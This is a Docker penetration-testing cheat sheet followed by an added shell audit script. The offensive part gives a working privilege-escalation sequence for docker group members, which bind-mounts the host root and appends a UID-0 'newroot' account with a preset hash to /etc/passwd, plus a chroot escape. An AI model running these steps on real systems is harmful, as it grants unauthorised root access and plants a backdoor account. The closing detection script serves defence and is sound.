Target> if [ -f "/.dockerenv" ] || grep -qE "^/docker/|/docker-ce/|/containerd/|/lxc/|/docker-[[:alnum:]]+/" /proc/1/cgroup ; then echo "Running inside a Docker container"; else echo "Not running inside a Docker container"; fi
Basic commands
# Check if docker service is running
sudo systemctl status docker
# If not running, start it
sudo systemctl stop docker
sudo systemctl start docker
# List of images
docker images
# List of remote host images
docker -H <target-ip>:2375 images
# List of running containers
docker ps -a
# Run the docker to an interactive container with a shell
#   -t: terminal
#   -i: interactive
docker exec -ti flast101 sh
# Connect to a running docker with an interactive shell
#   -t: terminal
#   -i: interactive
docker exec -ti flast101 sh
# Run a docker
#   -d: detach
#   -i: interactive
docker run -di --name flast101 alpine:latest
# Do you understand this command and potential vulnerability?
docker run -tid -v /etc/:/mnt/ --name flast101 ubuntu:latest bash
# GTFOBins. If you are a member of the "docker" group, replace alpine with a target docker name and run it.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
PE Local Enumeration
Linpeas.sh may catch the docker group account. In this case, you may be able to run the quick PE win below.
Quick Privilege Escalation win
# Validate if you can run. If not, you will see permission denied.
docker ps -a
# Prepare a new root user.
openssl passwd -1 -salt evil newrootpass
# Prepare a file for the new account
cd /tmp
echo 'newroot:$1$evil$eu2ySQGNgNghQm4ASTnKa.:0:0:root:/root:/bin/bash' > new.txt
# Run docker
docker run -tid -v /:/mnt/ --name flast101 alpine
# Execute a shell command in the container that will add the new root user to the /etc/passwd file
docker exec -ti flast101 sh -c "cat /mnt/tmp/new.txt >> /mnt/etc/passwd"
# Log in as the new root user
su newroot
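The detection side of the steps above, as an added example that is not part of the original page: it reports non-root accounts with UID 0, password hashes stored inline in /etc/passwd, and members of the docker group. The function names are hypothetical and the sample files are constructed to mirror the state the procedure leaves behind.

```shell
#!/bin/sh
# Added defensive example; file arguments default to the live system files.

# Accounts other than "root" that have UID 0 in a passwd-format file.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# Accounts whose hash sits in passwd field 2 instead of /etc/shadow.
inline_hash_accounts() {
    awk -F: '$2 ~ /^\$/ { print $1 }' "${1:-/etc/passwd}"
}

# Members of the "docker" group, one per line, from a group-format file.
docker_group_members() {
    awk -F: '$1 == "docker" && $4 != "" {
        n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i]
    }' "${1:-/etc/group}"
}

# Print findings; return 1 if any extra UID 0 or inline-hash account exists.
audit_host() {
    rc=0
    for u in $(extra_uid0_accounts "$1"); do echo "ALERT uid0 account: $u"; rc=1; done
    for u in $(inline_hash_accounts "$1"); do echo "ALERT inline hash: $u"; rc=1; done
    for u in $(docker_group_members "$2"); do echo "REVIEW docker group member: $u"; done
    return $rc
}

# Constructed sample files (not real data) mirroring the state after the steps above.
demo_dir=$(mktemp -d)
cat > "$demo_dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
newroot:$1$evil$eu2ySQGNgNghQm4ASTnKa.:0:0:root:/root:/bin/bash
EOF
cat > "$demo_dir/group" <<'EOF'
sudo:x:27:
docker:x:998:alice,bob
EOF
audit_host "$demo_dir/passwd" "$demo_dir/group" || echo "findings present"
```

Calling `audit_host` with no arguments checks the host's own /etc/passwd and /etc/group; docker group members are listed for review because membership is what allows the bind mount of / in the first place.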